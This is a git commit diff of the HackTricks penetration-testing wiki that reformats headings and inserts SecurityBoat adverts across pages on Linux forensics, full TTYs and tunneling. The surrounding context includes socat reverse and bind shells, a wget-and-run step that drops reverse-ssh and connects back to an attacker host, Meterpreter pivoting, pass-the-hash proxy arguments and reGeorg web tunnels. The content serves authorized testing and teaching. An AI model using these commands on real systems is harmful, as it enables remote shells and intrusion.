mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [#3195] No subject
This commit is contained in:
parent
ae9261cbcf
commit
b8b4c413da
23 changed files with 519 additions and 281 deletions
BIN
.gitbook/assets/SB logo black_034525.png
Normal file
BIN
.gitbook/assets/SB logo black_034525.png
Normal file
Binary file not shown.
After Width: | Height: | Size: 149 KiB |
11
README.md
11
README.md
|
@ -60,12 +60,21 @@ You can check their **blog** in [**https://blog.stmcyber.com**](https://blog.stm
|
|||
|
||||
![](<.gitbook/assets/image (620) (2) (1) (1) (1) (1) (1) (13).png>)
|
||||
|
||||
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform**
|
||||
**Intigriti** is the **Europe's #1** ethical hacking and **bug bounty platform.**
|
||||
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
|
||||
### [SecurityBoat](https://securityboat.in)
|
||||
|
||||
![](<.gitbook/assets/SB logo black\_034525.png>)
|
||||
|
||||
**Securityboat** is a cybersecurity company focused on providing top of the line **penetration testing services** and the most comprehensive **automated security testing** solutions based on an extensive **manual security testing methodology** that utilizes various case-specific and **industry-tested** solutions. They are committed to providing clear communication on cybersecurity issues, developing solutions, and prioritizing **business risk**.\
|
||||
**Make the right choice by contacting us for your security:**
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
|
||||
### [**INE**](https://ine.com)
|
||||
|
||||
![](<.gitbook/assets/INE\_Logo (3).jpg>)
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Linux Forensics
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,16 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Initial Information Gathering
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Basic Information
|
||||
## Initial Information Gathering
|
||||
|
||||
### Basic Information
|
||||
|
||||
First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get a ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USN, and modify the env variables to use those binaries:
|
||||
|
||||
|
@ -48,7 +54,7 @@ cat /etc/shadow #Unexpected data?
|
|||
find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory
|
||||
```
|
||||
|
||||
### Suspicious information
|
||||
#### Suspicious information
|
||||
|
||||
While obtaining the basic information you should check for weird things like:
|
||||
|
||||
|
@ -56,7 +62,7 @@ While obtaining the basic information you should check for weird things like:
|
|||
* Check **registered logins** of users without a shell inside `/etc/passwd`
|
||||
* Check for **password hashes** inside `/etc/shadow` for users without a shell
|
||||
|
||||
## Memory Dump
|
||||
### Memory Dump
|
||||
|
||||
In order to obtain the memory of the running system it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\
|
||||
In order to **compile** it you need to use the **exact same kernel** the victim machine is using.
|
||||
|
@ -81,14 +87,14 @@ LiME supports 3 **formats**:
|
|||
|
||||
LiME can also be use to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444`
|
||||
|
||||
## Disk Imaging
|
||||
### Disk Imaging
|
||||
|
||||
### Shutting down
|
||||
#### Shutting down
|
||||
|
||||
First of all you will need to **shutdown the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shutdown.\
|
||||
There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but I will also allow the possible **malware** to **destroy evidences**. The "pull the plug" approach may carry **some information loss** (as we have already took an image of the memory not much info is going to be lost) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug.
|
||||
|
||||
### Taking an image of the disk
|
||||
#### Taking an image of the disk
|
||||
|
||||
It's important to note that **before connecting to your computer anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying the any information.
|
||||
|
||||
|
@ -101,7 +107,7 @@ dcfldd if=<subject device> of=<image file> bs=512 hash=<algorithm> hashwindow=<c
|
|||
dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes
|
||||
```
|
||||
|
||||
## Disk Image pre-analysis
|
||||
### Disk Image pre-analysis
|
||||
|
||||
Imaging that you receive a disk image with no more data.
|
||||
|
||||
|
@ -158,9 +164,9 @@ icat -i raw -f ext4 disk.img 16
|
|||
ThisisTheMasterSecret
|
||||
```
|
||||
|
||||
# Search for known Malware
|
||||
## Search for known Malware
|
||||
|
||||
## Modified System Files
|
||||
### Modified System Files
|
||||
|
||||
Some Linux systems have a feature to **verify the integrity of many installed components**, providing an effective way to identify unusual or out of place files. For instance, `rpm -Va` on Linux is designed to verify all packages that were installed using RedHat Package Manager.
|
||||
|
||||
|
@ -172,7 +178,7 @@ dpkg --verify
|
|||
debsums | grep -v "OK$" #apt-get install debsums
|
||||
```
|
||||
|
||||
## Malware/Rootkit Detectors
|
||||
### Malware/Rootkit Detectors
|
||||
|
||||
Read the following page to learn about tools that can be useful to find malware:
|
||||
|
||||
|
@ -180,9 +186,9 @@ Read the following page to learn about tools that can be useful to find malware:
|
|||
[malware-analysis.md](malware-analysis.md)
|
||||
{% endcontent-ref %}
|
||||
|
||||
# Search installed programs
|
||||
## Search installed programs
|
||||
|
||||
## Package Manager
|
||||
### Package Manager
|
||||
|
||||
On Debian-based systems, the _**/var/ lib/dpkg/status**_ file contains details about installed packages and the _**/var/log/dpkg.log**_ file records information when a package is installed.\
|
||||
On RedHat and related Linux distributions the **`rpm -qa --root=/ mntpath/var/lib/rpm`** command will list the contents of an RPM database on a subject systems.
|
||||
|
@ -195,7 +201,7 @@ cat /var/log/dpkg.log | grep installed
|
|||
rpm -qa --root=/ mntpath/var/lib/rpm
|
||||
```
|
||||
|
||||
## Other
|
||||
### Other
|
||||
|
||||
**Not all installed programs will be listed by the above commands** because some applications are not available as packages for certain systems and must be installed from source. Therefore, a review of locations such as _**/usr/local**_ and _**/opt**_ may reveal other applications that have been compiled and installed from source code.
|
||||
|
||||
|
@ -213,13 +219,13 @@ find /sbin/ -exec dpkg -S {} \; | grep "no path found"
|
|||
find /sbin/ –exec rpm -qf {} \; | grep "is not"
|
||||
```
|
||||
|
||||
# Recover Deleted Running Binaries
|
||||
## Recover Deleted Running Binaries
|
||||
|
||||
![](<../../.gitbook/assets/image (641).png>)
|
||||
|
||||
# Inspect AutoStart locations
|
||||
## Inspect AutoStart locations
|
||||
|
||||
## Scheduled Tasks
|
||||
### Scheduled Tasks
|
||||
|
||||
```bash
|
||||
cat /var/spool/cron/crontabs/* \
|
||||
|
@ -235,7 +241,7 @@ cat /var/spool/cron/crontabs/* \
|
|||
ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/
|
||||
```
|
||||
|
||||
## Services
|
||||
### Services
|
||||
|
||||
It is extremely common for malware to entrench itself as a new, unauthorized service. Linux has a number of scripts that are used to start services as the computer boots. The initialization startup script _**/etc/inittab**_ calls other scripts such as rc.sysinit and various startup scripts under the _**/etc/rc.d/**_ directory, or _**/etc/rc.boot/**_ in some older versions. On other versions of Linux, such as Debian, startup scripts are stored in the _**/etc/init.d/**_ directory. In addition, some common services are enabled in _**/etc/inetd.conf**_ or _**/etc/xinetd/**_ depending on the version of Linux. Digital investigators should inspect each of these startup scripts for anomalous entries.
|
||||
|
||||
|
@ -248,11 +254,11 @@ It is extremely common for malware to entrench itself as a new, unauthorized ser
|
|||
* _**/etc/systemd/system**_
|
||||
* _**/etc/systemd/system/multi-user.target.wants/**_
|
||||
|
||||
## Kernel Modules
|
||||
### Kernel Modules
|
||||
|
||||
On Linux systems, kernel modules are commonly used as rootkit components to malware packages. Kernel modules are loaded when the system boots up based on the configuration information in the `/lib/modules/'uname -r'` and `/etc/modprobe.d` directories, and the `/etc/modprobe` or `/etc/modprobe.conf` file. These areas should be inspected for items that are related to malware.
|
||||
|
||||
## Other AutoStart Locations
|
||||
### Other AutoStart Locations
|
||||
|
||||
There are several configuration files that Linux uses to automatically launch an executable when a user logs into the system that may contain traces of malware.
|
||||
|
||||
|
@ -260,11 +266,11 @@ There are several configuration files that Linux uses to automatically launch an
|
|||
* _**∼/.bashrc**_ , _**∼/.bash\_profile**_ , _**\~/.profile**_ , _**∼/.config/autostart**_ are executed when the specific user logs in.
|
||||
* _**/etc/rc.local**_ It is traditionally executed after all the normal system services are started, at the end of the process of switching to a multiuser runlevel.
|
||||
|
||||
# Examine Logs
|
||||
## Examine Logs
|
||||
|
||||
Look in all available log files on the compromised system for traces of malicious execution and associated activities such as creation of a new service.
|
||||
|
||||
## Pure Logs
|
||||
### Pure Logs
|
||||
|
||||
**Logon** events recorded in the system and security logs, including logons via the network, can reveal that **malware** or an **intruder gained access** to a compromised system via a given account at a specific time. Other events around the time of a malware infection can be captured in system logs, including the **creation** of a **new** **service** or new accounts around the time of an incident.\
|
||||
Interesting system logons:
|
||||
|
@ -291,7 +297,7 @@ Interesting system logons:
|
|||
Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. In fact, because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering.
|
||||
{% endhint %}
|
||||
|
||||
## Command History
|
||||
### Command History
|
||||
|
||||
Many Linux systems are configured to maintain a command history for each user account:
|
||||
|
||||
|
@ -300,7 +306,7 @@ Many Linux systems are configured to maintain a command history for each user ac
|
|||
* \~/.sh\_history
|
||||
* \~/.\*\_history
|
||||
|
||||
## Logins
|
||||
### Logins
|
||||
|
||||
Using the command `last -Faiwx` it's possible to get the list of users that have logged in.\
|
||||
It's recommended to check if those logins make sense:
|
||||
|
@ -312,7 +318,7 @@ This is important as **attackers** some times may copy `/bin/bash` inside `/bin/
|
|||
|
||||
Note that you can also **take a look to this information reading the logs**.
|
||||
|
||||
## Application Traces
|
||||
### Application Traces
|
||||
|
||||
* **SSH**: Connections to systems made using SSH to and from a compromised system result in entries being made in files for each user account (_**∼/.ssh/authorized\_keys**_ and _**∼/.ssh/known\_keys**_). These entries can reveal the hostname or IP address of the remote hosts.
|
||||
* **Gnome Desktop**: User accounts may have a _**∼/.recently-used.xbel**_ file that contains information about files that were recently accessed using applications running in the Gnome desktop.
|
||||
|
@ -321,20 +327,20 @@ Note that you can also **take a look to this information reading the logs**.
|
|||
* **MySQL**: User accounts may have a _**∼/.mysql\_history**_ file that contains queries executed using MySQL.
|
||||
* **Less**: User accounts may have a _**∼/.lesshst**_ file that contains details about the use of less, including search string history and shell commands executed via less
|
||||
|
||||
## USB Logs
|
||||
### USB Logs
|
||||
|
||||
[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables.
|
||||
|
||||
It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USB to find "violation events" (the use of USBs that aren't inside that list).
|
||||
|
||||
## Installation
|
||||
### Installation
|
||||
|
||||
```
|
||||
pip3 install usbrip
|
||||
usbrip ids download #Downloal USB ID database
|
||||
```
|
||||
|
||||
## Examples
|
||||
### Examples
|
||||
|
||||
```
|
||||
usbrip events history #Get USB history of your curent linux machine
|
||||
|
@ -346,13 +352,13 @@ usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid
|
|||
|
||||
More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
|
||||
|
||||
# Review User Accounts and Logon Activities
|
||||
## Review User Accounts and Logon Activities
|
||||
|
||||
Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and/or used in close proximity to known unauthorized events. Also check possible sudo brute-force attacks.\
|
||||
Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\
|
||||
Finally look for accounts with **no passwords** or **easily guessed** passwords.
|
||||
|
||||
# Examine File System
|
||||
## Examine File System
|
||||
|
||||
File system data structures can provide substantial amounts of **information** related to a **malware** incident, including the **timing** of events and the actual **content** of **malware**.\
|
||||
**Malware** is increasingly being designed to **thwart file system analysis**. Some malware alter date-time stamps on malicious files to make it more difficult to find them with time line analysis. Other malicious code is designed to only store certain information in memory to minimize the amount of data stored in the file system.\
|
||||
|
@ -375,27 +381,27 @@ You can check the inodes of the files inside a folder using `ls -lai /bin |sort
|
|||
Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modify at the **same time** of the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**.
|
||||
{% endhint %}
|
||||
|
||||
# Compare files of different filesystem versions
|
||||
## Compare files of different filesystem versions
|
||||
|
||||
### Find added files
|
||||
#### Find added files
|
||||
|
||||
```bash
|
||||
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
|
||||
```
|
||||
|
||||
### Find Modified content
|
||||
#### Find Modified content
|
||||
|
||||
```bash
|
||||
git diff --no-index --diff-filter=M _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/ | grep -E "^\+" | grep -v "Installed-Time"
|
||||
```
|
||||
|
||||
### Find deleted files
|
||||
#### Find deleted files
|
||||
|
||||
```bash
|
||||
git diff --no-index --diff-filter=A _openwrt1.extracted/squashfs-root/ _openwrt2.extracted/squashfs-root/
|
||||
```
|
||||
|
||||
### Other filters
|
||||
#### Other filters
|
||||
|
||||
**`-diff-filter=[(A|C|D|M|R|T|U|X|B)…[*]]`**
|
||||
|
||||
|
@ -405,11 +411,17 @@ Also, **these upper-case letters can be downcased to exclude**. E.g. `--diff-fil
|
|||
|
||||
Note that not all diffs can feature all types. For instance, diffs from the index to the working tree can never have Added entries (because the set of paths included in the diff is limited by what is in the index). Similarly, copied and renamed entries cannot appear if detection for those types is disabled.
|
||||
|
||||
# References
|
||||
## References
|
||||
|
||||
* [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf)
|
||||
* [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/)
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -426,5 +438,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Full TTYs
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,8 +16,14 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# Full TTY
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
## Full TTY
|
||||
|
||||
Note that the shell you set in the `SHELL` variable **must** be **listed inside** _**/etc/shells**_ or `The value for the SHELL variable was not found the /etc/shells file This incident has been reported`. Also note that the next snippets only work in bash. If you're in a zsh, change to a bash before obtaining the shell by running `bash`.
|
||||
|
||||
|
@ -39,7 +45,7 @@ socat file:`tty`,raw,echo=0 tcp-listen:4444
|
|||
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
||||
```
|
||||
|
||||
## **Spawn shells**
|
||||
### **Spawn shells**
|
||||
|
||||
* `python -c 'import pty; pty.spawn("/bin/sh")'`
|
||||
* `echo os.system('/bin/bash')`
|
||||
|
@ -54,7 +60,7 @@ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
|
|||
* vi: `:set shell=/bin/bash:shell`
|
||||
* nmap: `!sh`
|
||||
|
||||
# ReverseSSH
|
||||
## ReverseSSH
|
||||
|
||||
A convenient way for **interactive shell access**, as well as **file transfers** and **port forwarding**, is dropping the statically-linked ssh server [ReverseSSH](https://github.com/Fahrj/reverse-ssh) onto the target.
|
||||
|
||||
|
@ -69,7 +75,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
/dev/shm/reverse-ssh -v -l -p 4444
|
||||
```
|
||||
|
||||
* \(2a\) Linux target:
|
||||
* (2a) Linux target:
|
||||
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
|
@ -78,7 +84,7 @@ wget -q https://github.com/Fahrj/reverse-ssh/releases/latest/download/upx_revers
|
|||
/dev/shm/reverse-ssh -p 4444 kali@10.0.0.2
|
||||
```
|
||||
|
||||
* \(2b\) Windows 10 target \(for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)\):
|
||||
* (2b) Windows 10 target (for earlier versions, check [project readme](https://github.com/Fahrj/reverse-ssh#features)):
|
||||
|
||||
```bash
|
||||
# Drop it via your preferred way, e.g.
|
||||
|
@ -97,7 +103,7 @@ ssh -p 8888 127.0.0.1
|
|||
sftp -P 8888 127.0.0.1
|
||||
```
|
||||
|
||||
# No TTY
|
||||
## No TTY
|
||||
|
||||
If for some reason you cannot obtain a full TTY you **still can interact with programs** that expects user input. In the following example, the password is passed to `sudo` to read a file:
|
||||
|
||||
|
@ -105,7 +111,12 @@ If for some reason you cannot obtain a full TTY you **still can interact with pr
|
|||
expect -c 'spawn sudo -S cat "/root/root.txt";expect "*password*";send "<THE_PASSWORD_OF_THE_USER>";send "\r\n";interact'
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -122,5 +133,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Tunneling and Port Forwarding
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,18 +16,24 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../.gitbook/assets/SB logo black_034525.png" alt="" data-size="original">\
|
||||
_A **digital transformation** tailored to your organization is unique. It also comes with its **risks**. **Defend yourself against hackers**. Get protection before it's too late. **Talk to the professionals at Securityboat**:_
|
||||
|
||||
# **SSH**
|
||||
{% embed url="https://securityboat.in/contact-us" %}
|
||||
{% endhint %}
|
||||
|
||||
SSH graphical connection \(X\)
|
||||
## **SSH**
|
||||
|
||||
SSH graphical connection (X)
|
||||
|
||||
```bash
|
||||
ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
|
||||
```
|
||||
|
||||
## Local Port2Port
|
||||
### Local Port2Port
|
||||
|
||||
Open new Port in SSH Server --> Other port
|
||||
Open new Port in SSH Server --> Other port
|
||||
|
||||
```bash
|
||||
ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in port 10521 from everywhere
|
||||
|
@ -37,9 +43,9 @@ ssh -R 0.0.0.0:10521:127.0.0.1:1521 user@10.0.0.1 #Local port 1521 accessible in
|
|||
ssh -R 0.0.0.0:10521:10.0.0.1:1521 user@10.0.0.1 #Remote port 1521 accessible in port 10521 from everywhere
|
||||
```
|
||||
|
||||
## Port2Port
|
||||
### Port2Port
|
||||
|
||||
Local port --> Compromised host \(SSH\) --> Third\_box:Port
|
||||
Local port --> Compromised host (SSH) --> Third\_box:Port
|
||||
|
||||
```bash
|
||||
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
|
||||
|
@ -47,18 +53,18 @@ ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_po
|
|||
sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
|
||||
```
|
||||
|
||||
## Port2hostnet \(proxychains\)
|
||||
### Port2hostnet (proxychains)
|
||||
|
||||
Local Port --> Compromised host \(SSH\) --> Wherever
|
||||
Local Port --> Compromised host (SSH) --> Wherever
|
||||
|
||||
```bash
|
||||
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
|
||||
```
|
||||
|
||||
## VPN-Tunnel
|
||||
### VPN-Tunnel
|
||||
|
||||
You need **root in both devices** \(as you are going to create new interfaces\) and the sshd config has to allow root login:
|
||||
`PermitRootLogin yes`
|
||||
You need **root in both devices** (as you are going to create new interfaces) and the sshd config has to allow root login:\
|
||||
`PermitRootLogin yes`\
|
||||
`PermitTunnel yes`
|
||||
|
||||
```bash
|
||||
|
@ -76,13 +82,13 @@ iptables -t nat -A POSTROUTING -s 1.1.1.2 -o eth0 -j MASQUERADE
|
|||
|
||||
Set new route on client side
|
||||
|
||||
```text
|
||||
```
|
||||
route add -net 10.0.0.0/16 gw 1.1.1.1
|
||||
```
|
||||
|
||||
# SSHUTTLE
|
||||
## SSHUTTLE
|
||||
|
||||
You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.
|
||||
You can **tunnel** via **ssh** all the **traffic** to a **subnetwork** through a host.\
|
||||
Example, forwarding all the traffic going to 10.10.10.0/24
|
||||
|
||||
```bash
|
||||
|
@ -90,18 +96,18 @@ pip install sshuttle
|
|||
sshuttle -r user@host 10.10.10.10/24
|
||||
```
|
||||
|
||||
# Meterpreter
|
||||
## Meterpreter
|
||||
|
||||
## Port2Port
|
||||
### Port2Port
|
||||
|
||||
Local port --> Compromised host \(active session\) --> Third\_box:Port
|
||||
Local port --> Compromised host (active session) --> Third\_box:Port
|
||||
|
||||
```bash
|
||||
# Inside a meterpreter session
|
||||
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
|
||||
```
|
||||
|
||||
## Port2hostnet \(proxychains\)
|
||||
### Port2hostnet (proxychains)
|
||||
|
||||
```bash
|
||||
background# meterpreter session
|
||||
|
@ -126,22 +132,22 @@ run #Proxy port 1080 by default
|
|||
echo "socks4 127.0.0.1 1080" > /etc/proxychains.conf #Proxychains
|
||||
```
|
||||
|
||||
# reGeorg
|
||||
## reGeorg
|
||||
|
||||
[https://github.com/sensepost/reGeorg](https://github.com/sensepost/reGeorg)
|
||||
|
||||
You need to upload a web file tunnel: ashx\|aspx\|js\|jsp\|php\|php\|jsp
|
||||
You need to upload a web file tunnel: ashx|aspx|js|jsp|php|php|jsp
|
||||
|
||||
```bash
|
||||
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
|
||||
```
|
||||
|
||||
# Chisel
|
||||
## Chisel
|
||||
|
||||
You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)
|
||||
You can download it from the releases page of [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
|
||||
You need to use the **same version for client and server**
|
||||
|
||||
## socks
|
||||
### socks
|
||||
|
||||
```bash
|
||||
./chisel server -p 8080 --reverse #Server
|
||||
|
@ -149,18 +155,18 @@ You need to use the **same version for client and server**
|
|||
#And now you can use proxychains with port 1080 (default)
|
||||
```
|
||||
|
||||
## Port forwarding
|
||||
### Port forwarding
|
||||
|
||||
```bash
|
||||
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse
|
||||
./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505
|
||||
```
|
||||
|
||||
# Rpivot
|
||||
## Rpivot
|
||||
|
||||
[https://github.com/klsecservices/rpivot](https://github.com/klsecservices/rpivot)
|
||||
|
||||
Reverse tunnel. The tunnel is started from the victim.
|
||||
Reverse tunnel. The tunnel is started from the victim.\
|
||||
A socks4 proxy is created on 127.0.0.1:1080
|
||||
|
||||
```bash
|
||||
|
@ -181,37 +187,37 @@ victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntl
|
|||
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
|
||||
```
|
||||
|
||||
# **Socat**
|
||||
## **Socat**
|
||||
|
||||
[https://github.com/andrew-d/static-binaries](https://github.com/andrew-d/static-binaries)
|
||||
|
||||
## Bind shell
|
||||
### Bind shell
|
||||
|
||||
```bash
|
||||
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
attacker> socat FILE:`tty`,raw,echo=0 TCP:<victim_ip>:1337
|
||||
```
|
||||
|
||||
## Reverse shell
|
||||
### Reverse shell
|
||||
|
||||
```bash
|
||||
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
|
||||
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
|
||||
```
|
||||
|
||||
## Port2Port
|
||||
### Port2Port
|
||||
|
||||
```bash
|
||||
socat TCP-LISTEN:<lport>,fork TCP:<redirect_ip>:<rport> &
|
||||
```
|
||||
|
||||
## Port2Port through socks
|
||||
### Port2Port through socks
|
||||
|
||||
```bash
|
||||
socat TCP-LISTEN:1234,fork SOCKS4A:127.0.0.1:google.com:80,socksport=5678
|
||||
```
|
||||
|
||||
## Meterpreter through SSL Socat
|
||||
### Meterpreter through SSL Socat
|
||||
|
||||
```bash
|
||||
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
|
||||
|
@ -231,7 +237,7 @@ OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|PROXY:hacke
|
|||
|
||||
[https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/](https://funoverip.net/2011/01/reverse-ssl-backdoor-with-socat-and-metasploit/)
|
||||
|
||||
## SSL Socat Tunnel
|
||||
### SSL Socat Tunnel
|
||||
|
||||
**/bin/sh console**
|
||||
|
||||
|
@ -251,9 +257,9 @@ attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=cli
|
|||
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
|
||||
```
|
||||
|
||||
## Remote Port2Port
|
||||
### Remote Port2Port
|
||||
|
||||
Connect the local SSH port \(22\) to the 443 port of the attacker host
|
||||
Connect the local SSH port (22) to the 443 port of the attacker host
|
||||
|
||||
```bash
|
||||
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
|
||||
|
@ -261,9 +267,9 @@ victim> while true; do socat TCP4:<attacker>:443 TCP4:127.0.0.1:22 ; done # Esta
|
|||
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
|
||||
```
|
||||
|
||||
# Plink.exe
|
||||
## Plink.exe
|
||||
|
||||
It's like a console PuTTY version \( the options are very similar to a ssh client\).
|
||||
It's like a console PuTTY version ( the options are very similar to a ssh client).
|
||||
|
||||
As this binary will be executed in the victim and it is a ssh client, we need to open our ssh service and port so we can have a reverse connection. Then, to forward a only locally accessible port to a port in our machine:
|
||||
|
||||
|
@ -272,23 +278,23 @@ echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <
|
|||
echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41 #Local port 9090 to out port 9090
|
||||
```
|
||||
|
||||
# NTLM proxy bypass
|
||||
## NTLM proxy bypass
|
||||
|
||||
The previously mentioned tool: **Rpivot**
|
||||
The previously mentioned tool: **Rpivot**\
|
||||
**OpenVPN** can also bypass it, setting these options in the configuration file:
|
||||
|
||||
```bash
|
||||
http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
|
||||
```
|
||||
|
||||
## Cntlm
|
